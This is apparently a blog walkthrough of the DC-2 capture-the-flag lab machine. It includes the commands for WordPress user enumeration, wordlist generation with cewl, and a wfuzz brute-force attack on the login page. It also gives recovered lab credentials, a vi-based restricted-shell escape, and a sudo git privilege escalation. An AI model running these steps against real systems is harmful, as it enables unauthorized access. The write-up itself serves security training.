I"ï<p>DC-2 is an easy machine. This machine starts with a <code class="language-plaintext highlighter-rouge">WordPress site</code>. After brute-forcing, We find out creds on the website that we use to get an <code class="language-plaintext highlighter-rouge">ssh session</code> on the box. Priv esc to root by exploiting <code class="language-plaintext highlighter-rouge">git SUID binary</code>.</p>
<h1 id="summary">Summary</h1>
<ul>
  <li>Portscan</li>
  <li>Adding Domain to Host file</li>
  <li>Finding users on wordpress</li>
  <li>Creating wordlist</li>
  <li>Bruteforce</li>
  <li>Logging in Wordpress</li>
  <li>SSH shell</li>
  <li>Updating low shell to higher shell</li>
  <li>Privilege Escalation</li>
  <li>Getting ROOT</li>
</ul>

<h1 id="portscan">Portscan</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre>Nmap scan report for 192.168.1.10
Host is up (0.00047s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Nmap scan show that port 80 and 7744 are open</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>Port 80: On this port, I find out a Domain name. I added to /etc/hosts file and surf the page. I discovered that WordPress is installed.

Port 7744: They are running SSH on this port. So I don't have any credentials so I moved forward.
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="initial-shell">Initial Shell:</h1>

<h2 id="flag-1">Flag 1:</h2>
<p>I got the first flag on the Main page
<img src="/assets/img/dc-2/flag1.png" alt="flag1" /></p>

<p>As per hint in the first flag, I created a password list using cewl.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>cewl <span class="nt">-w</span> password.txt http://dc-2
</pre></td></tr></tbody></table></code></pre></div></div>

<p>After that, I use wpscan to identify possible users and I found 3 users.</p>

<p><img src="/assets/img/dc-2/wpscan.png" alt="wpscan" /></p>

<p>Users :-</p>
<ul>
  <li>admin</li>
  <li>jerry</li>
  <li>tom</li>
</ul>

<p>Now I have a password and user list so I brute force the wordpress.
Here I use wfuzz to brute force.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>wfuzz <span class="nt">-c</span> <span class="nt">--hc</span><span class="o">=</span>200 <span class="nt">-z</span> file,users.txt <span class="nt">-z</span> file,password.txt <span class="nt">-d</span> <span class="s1">'log=FUZZ&amp;pwd=FUZ2Z&amp;wp-submit=Log+In'</span> http://dc-2/wp-login.php
</pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="/assets/img/dc-2/wfuzz.png" alt="wfuzz" /></p>

<p>Here I got 2 passwords.</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">jerry:adipiscing</code></li>
  <li><code class="language-plaintext highlighter-rouge">tom:parturient</code></li>
</ul>

<h2 id="flag-2">Flag 2:</h2>
<p>I use jerry password to access wordpress panel and got second flag.</p>

<p><img src="/assets/img/dc-2/flag2.png" alt="flag2" /></p>

<h2 id="first-user">First User:</h2>
<p>I spend some time to upload php reverse shell, but no luck :(
Then I tried same creds to access SSH on port 7744.
<code class="language-plaintext highlighter-rouge">$ ssh tom@dc-2 -p 7744</code></p>

<h2 id="updating-shell">Updating shell:</h2>

<p>I tried to cat the flag3.txt but no luck. We are in a restricted shell. I checked usr/bin directory and PATH variable I noticed that tom is using binaries from that directory.
Here I learned new things about how to launch a shell using vi.</p>

<p>Steps:</p>

<ol>
  <li>Open VI editor</li>
  <li>Press ESC + :</li>
  <li>set shell=/bin/bash</li>
  <li>Again step 1 and 2</li>
  <li>shell</li>
</ol>

<p>So I have shell using VI.</p>

<p>Now I am out of restricted shell but still using commands in usr/bin directory. I need to change PATH variable.</p>

<p><code class="language-plaintext highlighter-rouge">export PATH=/bin:/usr/bin:$PATH</code></p>

<h2 id="flag-3">Flag 3:</h2>
<p>Now I am able to cat the third flag.</p>

<p><img src="/assets/img/dc-2/flag3.png" alt="flag 3" /></p>

<h2 id="second-user">Second User:</h2>
<p>Flag gives hint we need to switch user i.e jerry.</p>

<blockquote>
  <p>jerry:adipiscing</p>
</blockquote>

<p><img src="/assets/img/dc-2/user2.png" alt="user2" /></p>

<h1 id="privesc-to-root">Privesc to root:</h1>

<p>Now I checked the sudoers list and found that I can run git without password.
<img src="/assets/img/dc-2/sudoer.png" alt="sudoer" /></p>

<p>After some googling I found a <a href="https://gtfobins.github.io/gtfobins/git/#shell">link</a>.
<img src="/assets/img/dc-2/gtfobins.png" alt="gtfobins" /></p>

<p><img src="/assets/img/dc-2/git.png" alt="git" /></p>

<h2 id="final-flag">Final Flag</h2>
<p><img src="/assets/img/dc-2/final.png" alt="final" /></p>

:ET